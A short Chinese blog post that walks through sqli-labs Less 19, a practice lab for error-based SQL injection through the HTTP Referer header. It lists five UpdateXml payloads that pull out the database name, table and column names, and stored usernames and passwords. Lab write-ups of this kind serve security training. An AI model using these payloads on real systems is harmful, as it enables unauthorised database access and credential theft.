【sqli-labs】 less19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)
2024-08-31 04:55:58
这个和less18一样,都是基于header的注入
这次的字段是referer
Referer: ' AND UpdateXml(1,concat(0x7e,database(),0x7e),1),1)#
Referer: 123' AND UpdateXml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1),1)#
Referer: 123' AND UpdateXml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e),1),1)#
Referer: 123' AND UpdateXml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),1),1)#
Referer: 123' AND UpdateXml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),1),1)#
最新文章
- 数据绑定控件之Repeater
- Atitit paip.对象方法的实现原理与本质.txt
- SQL Group By/Having
- 通达OA 公共文件柜二次开发添加管理信息(图文)
- 生命周期-初识IOS
- JVM(三)内存回收(一)
- 基于 Hexo + GitHub Pages 搭建个人博客(一)
- Redis学习——Windows环境下Redis的安装(二)
- Redis Index
- How to Build a New Habit: This is Your Strategy Guide
- JS变量声明方式
- Python开发 基礎知識 (未完代補)
- 深入理解JVM(四)JVM性能监控与故障处理工具
- [Big Data - Kafka] Kafka设计解析(三):Kafka High Availability (下)
- Redis的相关问题总结
- [Web 前端] this作用域问题
- 170814、Java使用gzip压缩文件、还原文件
- python3.4学习笔记(二十三) Python调用淘宝IP库获取IP归属地返回省市运营商实例代码
- 如何在64位WIN7旗舰版下安装SQL2000
- python接口自动化26-参数关联和JSESSIONID(上个接口返回数据作为下个接口请求参数)